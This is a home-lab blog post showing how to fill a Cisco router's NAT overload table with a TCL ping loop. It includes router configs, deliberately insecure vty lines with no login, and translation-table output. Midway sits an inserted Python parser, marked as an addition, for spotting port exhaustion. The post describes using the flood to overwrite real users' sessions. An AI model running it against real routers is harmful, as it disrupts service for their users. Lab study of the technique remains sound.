Did you ever have an itch to bring down a Cisco router? I did, several times. I will not try that in this post, but I will try to overflow the NAT table with sessions. Imagine this: you have one public IP and PAT (NAT overload), so every session is translated to that one address. That gives you a limit of 65536 simultaneous connections per protocol, because 65536 is the maximum number of ports (or ICMP identifiers) that can be associated with one IP. So what if I try to open 70 000 connections? 65536 will succeed, I can tell you that, but what about the rest? Well, let's try it safely at home.
Create a simple topology of two routers. R1 has PAT configured and a default route pointing to R2. You will reach Loopback0 of R2 from Loopback0 on R1. How do you open 70 000 sessions? Connect a host and open them from there, or use a TCL script on the router itself. But be warned, it can take about an hour to complete! I did this on an old crappy computer, so it was kinda slow.
R1:
hostname R1
!
interface Loopback0
 ip address 10.0.0.1 255.255.255.255
 ip nat inside
 ip virtual-reassembly
!
interface FastEthernet1/0
 ip address 192.168.12.1 255.255.255.0
 ip nat outside
 ip virtual-reassembly
!
ip nat translation icmp-timeout 500000
ip nat inside source list 1 interface FastEthernet1/0 overload
ip route 0.0.0.0 0.0.0.0 FastEthernet1/0 192.168.12.2
!
access-list 1 permit 10.0.0.1
!
line vty 0 4
 privilege level 15
 no login

R2:

hostname R2
!
interface Loopback0
 ip address 200.0.0.1 255.255.255.255
!
interface FastEthernet1/0
 ip address 192.168.12.2 255.255.255.0

And here is the TCL script. It repeats the command "ping 200.0.0.1 source loopback 0 repeat 1" 70 000 times. "Repeat 1" is how many echo requests each ping sends; one is enough, because every ping uses a fresh ICMP identifier and therefore creates a new translation. As you have noticed, I configured one sneaky command on R1: the ICMP translation timeout. By default, idle ICMP translations expire rather quickly (the default is 60 seconds), so I set it to an unreasonably high value. Without this, entries would keep expiring and I would never have all ports in use at once.
Enter the TCL shell with the command "tclsh" and paste this:

set repeat 70000
set command "ping 200.0.0.1 so lo0 r 1"
for { set i 1 } { $i <= $repeat } { incr i } {
    $command
}

Hit enter and enjoy your pings. One ping = one session. While it runs, you can telnet from R2 to R1 (the vty lines above have no login). Issue "terminal length 0" and then "show ip nat translations" to see all the translations so far.
One Hour Later
It took me one hour, but it is finally done. All 70 000 pings completed, the router is still alive, NAT is still alive, so nothing bad happened. Damn. Hmm, let's look closer…

R1#sh ip nat t
Pro Inside global      Inside local       Outside local      Outside global
icmp 192.168.12.1:0    10.0.0.1:0         200.0.0.1:0        200.0.0.1:0
icmp 192.168.12.1:1    10.0.0.1:1         200.0.0.1:1        200.0.0.1:1
icmp 192.168.12.1:2    10.0.0.1:2         200.0.0.1:2        200.0.0.1:2
icmp 192.168.12.1:3    10.0.0.1:3         200.0.0.1:3        200.0.0.1:3
icmp 192.168.12.1:4    10.0.0.1:4         200.0.0.1:4        200.0.0.1:4
icmp 192.168.12.1:5    10.0.0.1:5         200.0.0.1:5        200.0.0.1:5
icmp 192.168.12.1:6    10.0.0.1:6         200.0.0.1:6        200.0.0.1:6
icmp 192.168.12.1:7    10.0.0.1:7         200.0.0.1:7        200.0.0.1:7
icmp 192.168.12.1:8    10.0.0.1:8         200.0.0.1:8        200.0.0.1:8
icmp 192.168.12.1:9    10.0.0.1:9         200.0.0.1:9        200.0.0.1:9
icmp 192.168.12.1:10   10.0.0.1:10        200.0.0.1:10       200.0.0.1:10

And this goes on up to 65535. I was going to paste the full output here… Let's use the verbose output of the NAT table instead.

R1#sh ip nat t verbose
Pro Inside global      Inside local       Outside local      Outside global
icmp 192.168.12.1:0    10.0.0.1:0         200.0.0.1:0        200.0.0.1:0
    create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 1, lc_entries: 0
icmp 192.168.12.1:1    10.0.0.1:1         200.0.0.1:1        200.0.0.1:1
    create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 2, lc_entries: 0
icmp 192.168.12.1:2    10.0.0.1:2         200.0.0.1:2        200.0.0.1:2
    create 01:14:38, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 3, lc_entries: 0
icmp 192.168.12.1:3    10.0.0.1:3         200.0.0.1:3        200.0.0.1:3
    create 01:14:38, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 4, lc_entries: 0
icmp 192.168.12.1:4    10.0.0.1:4         200.0.0.1:4        200.0.0.1:4
    create 01:14:37, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 5, lc_entries: 0
icmp 192.168.12.1:5    10.0.0.1:5         200.0.0.1:5        200.0.0.1:5
    create 01:14:37, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1,

Look at 192.168.12.1:5 and 192.168.12.1:5643. Have you noticed? The "use" column is the time since the entry last saw a packet: entry :5 was created 01:14:37 ago but last used only about eight minutes ago, while :5643 has not been touched for an hour. So the behaviour here is rotary: once all 65536 ports are taken, allocation starts again from 0 and the first few thousand entries get reused. One caveat before generalising: in this lab the reuse cannot be told apart from a plain match, because IOS bumps the ICMP identifier with every ping, the identifier is a 16-bit field, and so the 65537th ping necessarily carries identifier 0 again and lands on the existing 10.0.0.1:0 translation (which is why "create" did not reset). A run with more than 65536 distinct inside source ports would be needed to show an entry being overwritten rather than matched. With ping nobody cares, but with TCP, if you really have 70 000 active sessions and real users own at least some of them, you have destroyed their sessions and replaced them with yours.
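The check above (comparing "create" against "use" to spot entries that were hit again after the port space wrapped) is easy to automate over the verbose output. The following Python parser is an added example, not code from the original post: it reads `show ip nat translations verbose` text, reports how many inside-global ports are in use per protocol and address against the 16-bit space, and flags entries whose last use is far more recent than their creation. The sample input is constructed to match the lab output format; the :5643 line and the tcp line are assumptions added for illustration.

```python
import re
from collections import defaultdict

PORT_SPACE = 65536  # 16-bit port / ICMP identifier space per protocol per global IP

# Constructed sample in the format of `show ip nat translations verbose`,
# modelled on the lab output in the post. The :5643 and tcp entries are
# assumptions added for illustration; they are not from the post.
SAMPLE = """\
Pro Inside global      Inside local       Outside local      Outside global
icmp 192.168.12.1:0    10.0.0.1:0         200.0.0.1:0        200.0.0.1:0
    create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 1, lc_entries: 0
icmp 192.168.12.1:1    10.0.0.1:1         200.0.0.1:1        200.0.0.1:1
    create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 2, lc_entries: 0
icmp 192.168.12.1:5643 10.0.0.1:5643      200.0.0.1:5643     200.0.0.1:5643
    create 01:09:12, use 01:09:12 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 5644, lc_entries: 0
tcp  192.168.12.1:1024 10.0.0.7:50231     203.0.113.9:443    203.0.113.9:443
    create 00:00:40, use 00:00:02 timeout:86400000, left 23:59:58, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 70001, lc_entries: 0
"""

# First line of each entry: proto, inside global, inside local, outside local, outside global.
ENTRY_RE = re.compile(
    r"^(?P<proto>icmp|tcp|udp)\s+"
    r"(?P<ig_ip>\d+\.\d+\.\d+\.\d+):(?P<ig_port>\d+)\s+"
    r"(?P<il_ip>\d+\.\d+\.\d+\.\d+):(?P<il_port>\d+)\s+"
    r"(?P<ol>\S+)\s+(?P<og>\S+)\s*$"
)
# Detail line that follows it in verbose mode; only create/use ages are needed here.
DETAIL_RE = re.compile(r"create\s+(?P<create>\S+),\s+use\s+(?P<use>\S+)\s")


def parse_age(s):
    """IOS age strings ('hh:mm:ss', 'NdNNh', 'NwNd') -> seconds."""
    m = re.fullmatch(r"(\d+):(\d+):(\d+)", s)
    if m:
        h, mi, se = map(int, m.groups())
        return h * 3600 + mi * 60 + se
    m = re.fullmatch(r"(\d+)d(\d+)h", s)
    if m:
        return int(m.group(1)) * 86400 + int(m.group(2)) * 3600
    m = re.fullmatch(r"(\d+)w(\d+)d", s)
    if m:
        return int(m.group(1)) * 604800 + int(m.group(2)) * 86400
    raise ValueError("unrecognised age: %r" % s)


def parse_translations(text):
    """Return one dict per translation, with create_s/use_s filled from the detail line."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            d = m.groupdict()
            d["ig_port"] = int(d["ig_port"])
            d["il_port"] = int(d["il_port"])
            entries.append(d)
            continue
        m = DETAIL_RE.search(line)
        if m and entries:
            entries[-1]["create_s"] = parse_age(m.group("create"))
            entries[-1]["use_s"] = parse_age(m.group("use"))
    return entries


def port_utilization(entries):
    """Distinct inside-global ports per (proto, global IP): (count, fraction of 65536)."""
    used = defaultdict(set)
    for e in entries:
        used[(e["proto"], e["ig_ip"])].add(e["ig_port"])
    return {k: (len(v), len(v) / PORT_SPACE) for k, v in used.items()}


def reused_entries(entries, proto="icmp", min_gap_s=60):
    """Entries created long ago but used recently.

    For one-packet flows such as the lab's pings, a fresh entry has create == use.
    A large gap means later traffic matched the entry again: in the lab that is
    the 16-bit ICMP identifier wrapping after 65536 pings. The heuristic is only
    meaningful for single-packet protocols, so it defaults to icmp.
    """
    return [e for e in entries
            if e["proto"] == proto and e["create_s"] - e["use_s"] >= min_gap_s]


def analyse(text):
    entries = parse_translations(text)
    return {
        "entries": len(entries),
        "utilization": port_utilization(entries),
        "reused": [(e["proto"], e["ig_ip"], e["ig_port"]) for e in reused_entries(entries)],
    }


if __name__ == "__main__":
    result = analyse(SAMPLE)
    for (proto, ip), (n, frac) in result["utilization"].items():
        print("%s %s: %d ports in use (%.4f%% of %d)" % (proto, ip, n, frac * 100, PORT_SPACE))
    print("entries touched again after creation:", result["reused"])
```

On a real router, capture the output with "terminal length 0" first (as the post does) and feed the whole text to `analyse()`; a utilization close to 1.0 for one (proto, address) pair is the exhaustion condition the post is looking for.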
Now that is significant: with this attack you can destroy valid active sessions belonging to users, drive up CPU and memory usage on the router, and consume bandwidth. If a router with a single NAT address serves as the translation point for thousands of real users, filling the table and overwriting valid sessions is much easier, because the users have already consumed most of the port space for you. Of course, I was able to do that because I don't have security implemented on the router: the vty lines have no login, the ICMP timeout was raised from its default, and no per-host or global cap on translations is set (IOS offers "ip nat translation max-entries" for exactly that). But still, a nice funny lab.